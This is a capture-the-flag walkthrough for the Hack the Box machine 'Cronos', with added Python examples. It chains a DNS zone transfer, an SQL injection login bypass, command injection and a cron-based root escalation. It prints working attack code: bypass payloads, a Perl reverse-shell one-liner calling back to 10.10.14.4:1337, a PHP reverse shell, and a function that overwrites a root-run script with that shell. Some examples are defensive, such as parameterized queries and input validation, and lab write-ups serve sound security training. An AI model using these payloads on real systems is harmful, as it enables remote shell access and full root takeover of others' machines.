Hack the Box – Cronos Walkthrough

Today we're going to solve another CTF machine, "Cronos". The box is now retired, so it is only accessible to VIP members.

Introduction

Specifications

  • Target OS: Linux
  • Services: SSH, HTTP, ISC Bind
  • IP Address: 10.10.10.13
  • Difficulty: Medium

Weakness

  • SQL Injection
  • Cron running as root

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is reconnaissance, starting with a port scan.

Ports Scanning

In this step we scan the target to see what services sit behind the IP address. The services found are the ones listed under Specifications: SSH, HTTP and ISC BIND (DNS). An exposed DNS server is what makes the next step worth trying.

Dig

Directory enumeration against the web server turned up nothing useful, so with BIND listening on port 53 the next thing to try is a DNS zone transfer (AXFR) for the cronos.htb domain against the target's own name server:

dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.10.6-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 311 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Wed Nov 28 17:22:46 CET 2018
;; XFR size: 7 records (messages 1, bytes 203)

The transfer succeeds and leaks the admin.cronos.htb name. After adding it to /etc/hosts (10.10.10.13 admin.cronos.htb) we reach an administrator login page.
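As an added example (not part of the original walkthrough), a small Python parser for dig AXFR output: it pulls the A/AAAA/CNAME records out of a transfer and turns every name that resolves to the target into a ready-made /etc/hosts line, so each leaked virtual host can be browsed by name. The zone text below, including the extra mail.cronos.htb record pointing at a second IP, is constructed for the demo; the function names are the example's own.

```python
import re

# Constructed sample of what "dig axfr @<ns> <zone>" prints when the name
# server allows a transfer (modelled on the page's output, not copied from it).
SAMPLE_AXFR = """\
; <<>> DiG 9.10.6-Debian <<>> axfr @10.10.10.13 cronos.htb
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
mail.cronos.htb.        604800  IN      A       10.10.10.99
;; Query time: 311 msec
"""

# owner-name. TTL IN TYPE value   (only the record types useful for host discovery)
RECORD_RE = re.compile(r"^(\S+)\.\s+\d+\s+IN\s+(A|AAAA|CNAME)\s+(\S+)\s*$")


def parse_axfr(text):
    """Return (name, type, value) for every A/AAAA/CNAME record in dig AXFR output.

    Comment lines (';'), SOA and NS records are skipped; trailing dots are removed."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if m:
            name, rtype, value = m.groups()
            records.append((name, rtype, value.rstrip(".")))
    return records


def names_pointing_at(text, ip):
    """Sorted, de-duplicated hostnames whose A/AAAA record resolves to ip."""
    return sorted({name for name, rtype, value in parse_axfr(text)
                   if rtype in ("A", "AAAA") and value == ip})


def hosts_line(text, ip):
    """One /etc/hosts line mapping ip to every virtual host the zone reveals for it."""
    names = names_pointing_at(text, ip)
    return f"{ip} {' '.join(names)}" if names else ""


if __name__ == "__main__":
    # Append the result to /etc/hosts and each vhost (e.g. admin.cronos.htb) resolves.
    print(hosts_line(SAMPLE_AXFR, "10.10.10.13"))
```

Names that resolve elsewhere (mail.cronos.htb here) are deliberately left out of the line for the target; they are still worth noting as separate hosts in the same zone.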

Login

Brute forcing the login with various wordlists and usernames did not work, so we tried SQL injection, first with sqlmap:

sqlmap -r sqlmap.req --level=5 --risk=3

sqlmap.req contains the captured POST request from the login form:

POST / HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://admin.cronos.htb/
Cookie: PHPSESSID=dnurhq6mp01mvc7thl7t4v56t3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=admin

sqlmap reports that the username field is injectable.

Alternatively, the injection can be done by hand; the OWASP SQL injection wiki describes the usual techniques.

Use admin' -- (with a space after the two dashes) as the username and any password: the quote closes the string and the comment removes the AND password = ... check from the query, so we are logged in as admin.
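Added example, not from the original post: the query pattern behind this bypass, reproduced in Python against an in-memory SQLite table, beside the parameterized version that the same payloads cannot get past. The users table, its one account and the function names are constructed for the demo; the target's real schema is unknown.

```python
import sqlite3


def build_query(username, password):
    """The vulnerable pattern: user input spliced straight into the SQL text."""
    return (f"SELECT username FROM users "
            f"WHERE username = '{username}' AND password = '{password}'")


def make_db():
    """In-memory stand-in for the admin panel's users table (constructed account)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cretPassw0rd')")
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """Runs the concatenated query; a quote in the input changes the query's meaning."""
    return db.execute(build_query(username, password)).fetchone() is not None


def login_safe(db, username, password):
    """Bound parameters: the quote and the '-- ' arrive as data, never as SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


# Payloads that work on both MySQL and SQLite. MySQL requires whitespace after
# '--', SQLite does not; 'admin'#' is a MySQL-only variant (SQLite has no '#'
# comment), so it is left out of this portable list.
BYPASS_PAYLOADS = [
    "admin' -- ",   # closes the string, comments out the password check
    "' OR 1=1 -- ", # needs no username at all: the WHERE clause matches every row
]


if __name__ == "__main__":
    db = make_db()
    for payload in BYPASS_PAYLOADS:
        print(build_query(payload, "x"))
        print("  vulnerable:", login_vulnerable(db, payload, "x"),
              " safe:", login_safe(db, payload, "x"))
```

Printing build_query for the first payload shows exactly why the login succeeds: everything after -- is a comment, so the executed statement is effectively SELECT username FROM users WHERE username = 'admin'.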

Command Injection

The admin panel feeds our input to a shell command, so we can chain a command of our own by appending ';' followed by that command (see Example 6 on the OWASP Command Injection page):

Example 6: https://www.owasp.org/index.php/Command_Injection

Let’s get a reverse shell.

Perl is installed on the target, so we use a Perl reverse shell. Start a listener on 10.10.14.4:1337 first (the IP and port embedded in the payload), then submit the following as the injected command:

;perl -e 'use Socket;$i="10.10.14.4";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And we get a shell as the web server user.
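Added example, not from the original post: the vulnerable pattern behind this injection beside a hardened version, in Python. echo stands in for whatever network utility the admin panel wraps (the page does not say which), so the block runs offline; the hostname allow-list pattern, the function names and the payload builder are the example's own, and the one-liner the builder returns is the page's Perl reverse shell.

```python
import re
import subprocess


def run_tool_vulnerable(host):
    """Interpolates the user's input into a shell command line, the flaw the admin
    panel has. 'echo' stands in for the panel's network utility (constructed)."""
    cmd = f"echo probing {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Allow-list for a hostname or dotted IPv4 address: labels of letters, digits
# and hyphens, separated by dots. Shell metacharacters cannot match.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def valid_host(host):
    return HOST_RE.match(host) is not None


def run_tool_safe(host):
    """Validates first, then passes the value as its own argv element: no shell is
    involved, so ';', '|', '$(...)' and friends are just characters in an argument."""
    if not valid_host(host):
        raise ValueError(f"rejected: {host!r}")
    return subprocess.run(["echo", "probing", host], capture_output=True, text=True).stdout


def injected_lines(output):
    """Output lines the tool itself did not produce: evidence that a chained command ran."""
    return [line for line in output.splitlines() if not line.startswith("probing ")]


def reverse_shell_payload(lhost, lport):
    """The page's Perl one-liner, prefixed with ';' so it runs after the tool's own command."""
    perl = ('use Socket;$i="%s";$p=%d;'
            'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
            'if(connect(S,sockaddr_in($p,inet_aton($i)))){'
            'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");'
            'exec("/bin/sh -i");};') % (lhost, lport)
    return ";perl -e '" + perl + "'"


if __name__ == "__main__":
    probe = "127.0.0.1; echo INJECTED"
    print("vulnerable output:", run_tool_vulnerable(probe))
    print("extra lines:", injected_lines(run_tool_vulnerable(probe)))
    try:
        run_tool_safe(probe)
    except ValueError as e:
        print("hardened version:", e)
    print(reverse_shell_payload("10.10.14.4", 1337))
```

The harmless probe (`; echo INJECTED`) is the check to run before sending a real payload: if the marker shows up in the response, the input reaches a shell and the reverse shell one-liner will run the same way.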

Privilege Escalation

With a shell as the web server user, the next goal is root. Running an enumeration script collects the basic information needed for that.

Normally I use LinEnum.sh, which gathers the usual suspects. In this case the system crontab contains a job that runs a file under /var/www as root:

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Root runs php /var/www/laravel/artisan schedule:run every minute. That script lives in the web root we already control as the web server user, so if /var/www/laravel/artisan is writable by that user (check with ls -l /var/www/laravel/artisan), we can overwrite it with a PHP reverse shell, start a listener, and within a minute cron hands us a shell as root. Keep a copy of the original artisan so the box can be restored afterwards.
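Added example, not from the walkthrough, and generalized beyond the single artisan line: a Python enumeration step for this class of weakness. It parses /etc/crontab-style text, finds every absolute path in a command root runs, reports which of them the current user can write to or replace (a writable parent directory counts, and so does a script that does not exist yet), and then backs up and overwrites the chosen script with a minimal PHP reverse shell pointing at the listener. The crontab text, the temporary-directory stand-in for /var/www/laravel/artisan and the function names are constructed for the demo; 10.10.14.4:1337 are the listener values the page uses.

```python
import os
import re
import shutil
import tempfile

# Constructed crontab text modelled on the page's /etc/crontab (not copied from the target).
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
@reboot         www-data /usr/local/bin/warm-cache.sh
"""

ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")     # SHELL=..., PATH=...
REDIRECT = re.compile(r"[0-9]*>>?\s*\S+")              # drops '>> /dev/null' and '2>&1'
ABS_PATH = re.compile(r"/[^\s;&|()]+|/(?=\s|$)")       # absolute paths, including a bare '/'


def cron_entries(text):
    """Parse /etc/crontab-style text (which has a user field) into (user, command) pairs."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        special = line.startswith("@")                 # @reboot, @daily, ...
        parts = line.split(None, 2) if special else line.split(None, 6)
        if len(parts) == (3 if special else 7):
            entries.append((parts[-2], parts[-1]))
    return entries


def how_writable(path):
    """Why the current user could make root execute their code at this path, or None."""
    if os.path.exists(path) and os.access(path, os.W_OK):
        return "writable"
    parent = os.path.dirname(path.rstrip("/")) or "/"
    if os.path.isdir(parent) and os.access(parent, os.W_OK):
        if os.path.exists(path):
            return "parent directory writable (file can be replaced)"
        return "missing, parent directory writable"
    return None


def root_cron_targets(text):
    """(path, reason, command) for every path in a root cron command we could control."""
    hits = []
    for user, cmd in cron_entries(text):
        if user != "root":
            continue
        for path in ABS_PATH.findall(REDIRECT.sub("", cmd)):
            reason = how_writable(path)
            if reason:
                hits.append((path, reason, cmd))
    return hits


# Minimal PHP reverse shell: connect back and hand /bin/sh the socket as stdin/stdout/stderr.
PHP_REVERSE_SHELL = """<?php
$sock = fsockopen("{lhost}", {lport});
$proc = proc_open("/bin/sh -i", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
"""


def plant_php_payload(path, lhost, lport):
    """Back up the target script, overwrite it with the reverse shell, return the backup path."""
    backup = path + ".bak"
    shutil.copy2(path, backup)
    with open(path, "w") as f:
        f.write(PHP_REVERSE_SHELL.format(lhost=lhost, lport=lport))
    return backup


def demo(lhost="10.10.14.4", lport=1337):
    """Self-contained run: a writable stand-in for artisan in a temp dir, a crontab
    referencing it, detection, then planting. Returns the pieces worth checking."""
    d = tempfile.mkdtemp()
    artisan = os.path.join(d, "artisan")            # exists and is writable
    missing = os.path.join(d, "cleanup.sh")         # referenced by root but absent
    with open(artisan, "w") as f:
        f.write("#!/usr/bin/env php\n<?php echo 'original';\n")
    text = SAMPLE_CRONTAB + (
        f"* * * * *       root    php {artisan} schedule:run >> /dev/null 2>&1\n"
        f"5 *     * * *   root    {missing}\n"
        f"* * * * *       www-data php {artisan}\n"   # not root: must be ignored
    )
    hits = {path: reason for path, reason, _ in root_cron_targets(text)}
    backup = plant_php_payload(artisan, lhost, lport)
    with open(artisan) as f:
        planted = f.read()
    return {"artisan": artisan, "missing": missing, "hits": hits,
            "backup": backup, "planted": planted}


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=>", v)
```

On the target the real check is how_writable('/var/www/laravel/artisan') as www-data; if it reports writable, plant_php_payload there, start the listener on 10.10.14.4:1337, and wait for the next minute boundary. Restore the file from the .bak afterwards so the scheduler keeps working.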
